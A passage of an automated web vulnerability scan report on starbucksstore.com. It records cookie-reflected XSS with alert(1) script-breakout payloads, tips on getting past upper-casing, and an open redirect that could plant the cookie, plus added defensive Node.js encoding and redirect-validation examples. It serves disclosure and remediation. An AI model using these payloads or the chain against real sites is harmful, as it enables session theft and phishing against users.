   var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.71. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.72. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-reserve

Issue detail

The value of the CookingAd cookie (its CCAID field) is copied into a JavaScript string which is encapsulated in double quotation marks, inside an inline script block. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. The input was echoed into the response with no encoding applied; the only transformation is that the application upper-cases it (see s_prop3 in the response below).

This proof-of-concept demonstrates that the injected </script> terminates the script block: the HTML parser matches the closing tag case-insensitively, so upper-casing does not prevent the breakout. Note, though, that JavaScript identifiers are case-sensitive, so the alert(1) in this payload arrives as ALERT(1) and will not run as sent; an attacker needs a payload that survives upper-casing, for example a script element whose src attribute refers to a host name, which is case-insensitive.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that on this site /aff/adredir.asp sets the CookingAd cookie from its CCAID query parameter (see the Set-Cookie header in section 4), so a crafted link may be enough to plant the value; whether that endpoint filters the value is not shown in this report.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal: escape backslashes, quotes and line terminators, and escape < and > as \x3c and \x3e so that the sequence </script can never reach the HTML parser. HTML entity encoding and case transformation do not protect this context.

Request

GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
ve Coffee Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Reserve Coffee Page"
   var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-reserve/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.73. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal

Issue detail

The value of the CookingAd cookie (its CCAID field) is copied into a JavaScript string which is encapsulated in double quotation marks, inside an inline script block. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. The input was echoed into the response with no encoding applied; the only transformation is that the application upper-cases it (see s_prop3 in the response below).

This proof-of-concept demonstrates that the injected </script> terminates the script block: the HTML parser matches the closing tag case-insensitively, so upper-casing does not prevent the breakout. Note, though, that JavaScript identifiers are case-sensitive, so the alert(1) in this payload arrives as ALERT(1) and will not run as sent; an attacker needs a payload that survives upper-casing, for example a script element whose src attribute refers to a host name, which is case-insensitive.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that on this site /aff/adredir.asp sets the CookingAd cookie from its CCAID query parameter (see the Set-Cookie header in section 4), so a crafted link may be enough to plant the value; whether that endpoint filters the value is not shown in this report.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal: escape backslashes, quotes and line terminators, and escape < and > as \x3c and \x3e so that the sequence </script can never reach the HTML parser. HTML entity encoding and case transformation do not protect this context.

Request

GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.74. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The value of the CookingAd cookie (its CCAID field) is copied into a JavaScript string which is encapsulated in double quotation marks, inside an inline script block. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. The input was echoed into the response with no encoding applied; the only transformation is that the application upper-cases it (see s_prop3 in the response below).

This proof-of-concept demonstrates that the injected </script> terminates the script block: the HTML parser matches the closing tag case-insensitively, so upper-casing does not prevent the breakout. Note, though, that JavaScript identifiers are case-sensitive, so the alert(1) in this payload arrives as ALERT(1) and will not run as sent; an attacker needs a payload that survives upper-casing, for example a script element whose src attribute refers to a host name, which is case-insensitive.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that on this site /aff/adredir.asp sets the CookingAd cookie from its CCAID query parameter (see the Set-Cookie header in section 4), so a crafted link may be enough to plant the value; whether that endpoint filters the value is not shown in this report.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal: escape backslashes, quotes and line terminators, and escape < and > as \x3c and \x3e so that the sequence </script can never reach the HTML parser. HTML entity encoding and case transformation do not protect this context.

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.75. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-via

Issue detail

The value of the CookingAd cookie (its CCAID field) is copied into a JavaScript string which is encapsulated in double quotation marks, inside an inline script block. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. The input was echoed into the response with no encoding applied; the only transformation is that the application upper-cases it (see s_prop3 in the response below).

This proof-of-concept demonstrates that the injected </script> terminates the script block: the HTML parser matches the closing tag case-insensitively, so upper-casing does not prevent the breakout. Note, though, that JavaScript identifiers are case-sensitive, so the alert(1) in this payload arrives as ALERT(1) and will not run as sent; an attacker needs a payload that survives upper-casing, for example a script element whose src attribute refers to a host name, which is case-insensitive.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that on this site /aff/adredir.asp sets the CookingAd cookie from its CCAID query parameter (see the Set-Cookie header in section 4), so a crafted link may be enough to plant the value; whether that endpoint filters the value is not shown in this report.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal: escape backslashes, quotes and line terminators, and escape < and > as \x3c and \x3e so that the sequence </script can never reach the HTML parser. HTML entity encoding and case transformation do not protect this context.

Request

GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
eName="Starbucks VIA Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks VIA Page"
   var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-via/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.76. http://www.starbucksstore.com/tea [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /tea

Issue detail

The value of the CookingAd cookie (its CCAID field) is copied into a JavaScript string which is encapsulated in double quotation marks, inside an inline script block. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. The input was echoed into the response with no encoding applied; the only transformation is that the application upper-cases it (see s_prop3 in the response below).

This proof-of-concept demonstrates that the injected </script> terminates the script block: the HTML parser matches the closing tag case-insensitively, so upper-casing does not prevent the breakout. Note, though, that JavaScript identifiers are case-sensitive, so the alert(1) in this payload arrives as ALERT(1) and will not run as sent; an attacker needs a payload that survives upper-casing, for example a script element whose src attribute refers to a host name, which is case-insensitive.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that on this site /aff/adredir.asp sets the CookingAd cookie from its CCAID query parameter (see the Set-Cookie header in section 4), so a crafted link may be enough to plant the value; whether that endpoint filters the value is not shown in this report.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal: escape backslashes, quotes and line terminators, and escape < and > as \x3c and \x3e so that the sequence </script can never reach the HTML parser. HTML entity encoding and case transformation do not protect this context.
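The following is an added example, written for this edit and not code from the report, from Burp Suite or from starbucksstore.com. It reproduces in Node.js the pattern seen in the s_prop3 assignments of issues 3.71 to 3.76 (a cookie field upper-cased and written into a double-quoted JavaScript string) and places a correct encoder for that context beside it. The template line, the upper-casing and the sample payload are taken from the requests and responses in those issues; the function names, the "fixed" rendering and the breakout check are this example's own assumptions. The check models the HTML tokenizer, which ends script data at "</script" case-insensitively, which is why the site's upper-casing is no defence; the round-trip shows the encoder loses no data.

```javascript
// Added example (not from the XSS.CX/Burp report or the site): the vulnerable
// inline-script pattern behind issues 3.71-3.76 next to a corrected encoder
// for the JavaScript-string context. Function names are this example's own.

// Constructed input: the CookingAd CCAID value exactly as issue 3.71 sent it.
const REPORT_PAYLOAD = 'SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b';

// What the application does today (as far as the responses show): upper-case
// the cookie field and write it straight into a double-quoted JS string.
function renderVulnerable(ccaid) {
  return 'var s_prop3="' + String(ccaid).toUpperCase() + '"';
}

// Escape a value for a double-quoted JS string literal inside inline script.
// Everything outside a small safe alphabet is \xHH / \uHHHH escaped, so the
// string cannot be closed early ("), the statement cannot be broken
// (newline, U+2028/U+2029), and the HTML parser never sees "</script".
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9 ,.\-_]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Same template, but the value is encoded for the context it lands in.
function renderFixed(ccaid) {
  return 'var s_prop3="' + jsStringEncode(String(ccaid).toUpperCase()) + '"';
}

// The HTML tokenizer ends script data at "</script" followed by whitespace,
// "/" or ">", regardless of case; the JavaScript tokenizer never gets a say.
// This is the check that case transformation cannot pass.
function breaksOutOfScript(scriptBody) {
  return /<\/script[\t\n\f />]/i.test(scriptBody);
}

// Round-trip: evaluate the encoded literal with the real JS engine and
// confirm it yields the original data, i.e. the encoding loses nothing.
function decodeWithEngine(encoded) {
  return new Function('return "' + encoded + '";')();
}

function demo() {
  const vulnerable = renderVulnerable(REPORT_PAYLOAD);
  const fixed = renderFixed(REPORT_PAYLOAD);
  return {
    vulnerable,
    fixed,
    vulnerableBreaksOut: breaksOutOfScript(vulnerable), // true
    fixedBreaksOut: breaksOutOfScript(fixed),           // false
    roundTripOk: decodeWithEngine(jsStringEncode(REPORT_PAYLOAD)) === REPORT_PAYLOAD,
  };
}

console.log(demo());
```

The vulnerable rendering reproduces the s_prop3 line from issue 3.71 byte for byte. Note that the JavaScript engine would happily parse that line too, since "</SCRIPT>" is ordinary text inside a JS string; only the HTML parser's view matters here, which is why a check built on a JS parser or on HTML entity encoding misses this class of bug.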

Request

GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close


       <head>
       <title>Tea at Starbucks Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
...[SNIP]...
ageName="Tazo Tea HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Tazo Tea HomePage"
   var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/tea/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=
...[SNIP]...

4. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL (the Location header of the response below):

http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750

The host is entirely attacker-chosen: the application appends its own query string to whatever it was given and issues the 302 without checking that the target lies on its own domain. Note also that the same response sets the CookingAd cookie from the CCAID parameter of this request, which is the cookie echoed unencoded in issues 3.71 to 3.76.

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.

Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.

The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. The function should then prepend the application's own scheme and host to the URL before issuing the redirect.

The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with the application's own scheme and host, followed by a slash, before issuing the redirect.

A check that the value merely starts with a slash is not sufficient on its own: browsers treat //host/ and /\host/ as absolute URLs, so the function must also reject a second leading slash or backslash, or, more robustly, resolve the supplied value against the site's own origin and compare the resulting origin before redirecting.
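As an added example (written for this edit, not code from the report, from Burp Suite or from starbucksstore.com), the following Node.js code implements the two recommended approaches for an endpoint shaped like /aff/adredir.asp: resolving the supplied Redir value against the site's own origin with the WHATWG URL parser and rejecting anything that lands elsewhere, and a server-side table of permitted targets selected by key. The site origin and the attacker host a249f6ddae8196a18 come from the request and response above; the function names, the bypass variants in the candidate list and the table contents are this example's assumptions.

```javascript
// Added example (not from the report or the site): safe handling of a
// user-supplied redirect target, for the /aff/adredir.asp?Redir=... pattern.

const SITE_ORIGIN = 'http://www.starbucksstore.com';

// Constructed inputs: the report's payload plus the usual shapes that a
// naive "starts with /" or "contains our host name" check lets through.
const CANDIDATES = [
  '/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750', // legitimate
  'http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100',   // the report's payload
  '//a249f6ddae8196a18/',                                // scheme-relative
  '/\\a249f6ddae8196a18/',                               // backslash, parsed as "/"
  'http://www.starbucksstore.com.a249f6ddae8196a18/',    // host-suffix trick
  'http://u:p@www.starbucksstore.com/',                  // credentials in authority
  'javascript:alert(1)',                                 // non-HTTP scheme
  'http://www.starbucksstore.com/tea',                   // legitimate, absolute
];

// Resolve the candidate the way a browser would (WHATWG parsing against the
// site origin) and accept it only if it still lands on our origin. Returns
// the absolute URL to redirect to, or null so the caller can fall back to a
// safe default page. Resolving first and comparing origins afterwards is
// what defeats the "//host", "/\host" and host-suffix variants; the scheme
// check falls out of the origin comparison (javascript: has origin "null").
function safeRedirectTarget(candidate, siteOrigin = SITE_ORIGIN) {
  let url;
  try {
    url = new URL(String(candidate), siteOrigin);
  } catch (e) {
    return null; // unparseable input
  }
  if (url.origin !== new URL(siteOrigin).origin) return null;
  if (url.username || url.password) return null; // reject http://user@host forms
  return url.href;
}

// Stricter alternative, as the remediation advice recommends: the client
// supplies only a key into a server-side table, never a URL.
const REDIRECT_TABLE = {
  shprodli_8750: '/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750',
  tea: '/tea/default.asp',
};

function redirectByKey(key, siteOrigin = SITE_ORIGIN) {
  // hasOwnProperty guards against keys like "constructor" or "__proto__".
  if (!Object.prototype.hasOwnProperty.call(REDIRECT_TABLE, key)) return null;
  return new URL(REDIRECT_TABLE[key], siteOrigin).href;
}

// Returns [candidate, decision] pairs; null means "refuse and use the default".
function demo() {
  return CANDIDATES.map((c) => [c, safeRedirectTarget(c)]);
}

console.log(demo());
console.log(redirectByKey('tea'), redirectByKey('nope'));
```

Only the first and last candidates are accepted; every other entry, including the report's own payload, resolves to an origin other than http://www.starbucksstore.com and is refused. The table-driven variant removes the parsing problem entirely and is the better choice where the set of targets is known, as it is for an affiliate-ad redirector.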

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
...[SNIP]...
